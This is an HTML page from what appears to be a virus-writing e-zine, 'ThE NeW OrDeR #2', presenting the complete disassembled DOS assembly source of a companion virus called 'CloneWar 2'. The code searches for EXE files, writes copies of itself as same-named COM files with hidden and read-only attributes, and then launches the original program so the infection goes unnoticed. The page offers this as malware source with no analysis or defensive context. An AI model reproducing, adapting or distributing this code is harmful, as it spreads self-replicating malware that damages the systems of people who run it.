<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>CLONWAR
2</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>CSEG SEGMENT<br>
ASSUME CS:CSEG,DS:NOTHING<br>
<br>
ORG 100H<br>
<br>
START:<br>
jmp VIR_BEGIN<br>
<br>
<br>
; db &quot;[CloneWar2]&quot;<br>
WILDCARD DB &quot;*.EXE&quot;,0<br>
FILE_EXT DB &quot;COM&quot;,0<br>
FILE_FOUND DB 12 DUP(' '), 0<br>
FILE_CREATE DB 12 DUP(' '), 0<br>
SEARCH_ATTRIB DW 17H<br>
NUM_INFECT DW 0<br>
<br>
<br>
My_Cmd:<br>
CMD_LEN DB 13<br>
FILE_CLONE DB 12 DUP (' '), 0<br>
<br>
Vir_begin:<br>
<br>
mov sp,offset STACK_HERE<br>
mov bx,sp<br>
add bx,15<br>
mov cl,4<br>
shr bx,cl<br>
mov ah,4ah<br>
int 21h<br>
<br>
mov di,OFFSET FILE_CLONE<br>
mov si,OFFSET FILE_FOUND<br>
mov cx,12<br>
rep movsb<br>
<br>
Read_dir: mov dx,OFFSET WILDCARD<br>
mov cx,SEARCH_ATTRIB<br>
<br>
mov ah,4Eh<br>
int 21h<br>
<br>
jc EXIT<br>
<br>
Store_name:<br>
<br>
mov di,OFFSET FILE_FOUND<br>
mov si,158<br>
mov cx,12<br>
rep movsb<br>
<br>
mov di,OFFSET FILE_CREATE<br>
mov si,158<br>
mov cx,12<br>
rep movsb<br>
<br>
cld<br>
mov di,OFFSET FILE_CREATE<br>
mov al,'.'<br>
mov cx,9<br>
repne scasb<br>
<br>
mov si,OFFSET FILE_EXT<br>
mov cx,3<br>
rep movsb<br>
<br>
Check_file:<br>
mov dx,OFFSET FILE_CREATE<br>
xor cx,cx<br>
mov ax,3d00h<br>
int 21h<br>
jnc find_next<br>
<br>
Infect_file:<br>
<br>
mov dx,OFFSET FILE_CREATE<br>
xor cx,cx<br>
mov ah,3ch<br>
int 21h<br>
jc EXIT<br>
<br>
xchg bx,ax<br>
mov cx,(OFFSET END_OF_CODE - OFFSET START)<br>
mov dx,OFFSET START<br>
mov ah,40h<br>
int 21h<br>
<br>
;Close file<br>
mov ah,3eh<br>
int 21h<br>
<br>
mov dx,OFFSET FILE_CREATE<br>
mov cx,3<br>
mov ax,4301h<br>
int 21h<br>
jmp prepare_command<br>
<br>
find_next:<br>
mov ah, 4fh<br>
int 21h<br>
jmp store_name<br>
</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>Prepare_command:<br>
<br>
cld<br>
mov di,OFFSET FILE_CLONE<br>
mov al,0<br>
mov cx,12<br>
repne scasb<br>
<br>
mov al,0Dh<br>
stosb<br>
<br>
mov ax,12<br>
sub ax,cx<br>
mov CMD_LEN, al<br>
<br>
</strong></font><font color="#FFFFFF"><strong><br>
Exit:<br>
</strong></font><font color="#FFFFFF"><strong>mov si, OFFSET
MY_CMD<br>
int 2Eh<br>
</strong></font><font color="#FFFFFF"><strong>mov ax,4C00H<br>
int 21h<br>
<br>
<br>
END_OF_CODE = $<br>
<br>
STACK_HERE EQU END_OF_CODE + 512<br>
<br>
CSEG ENDS<br>
END START</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
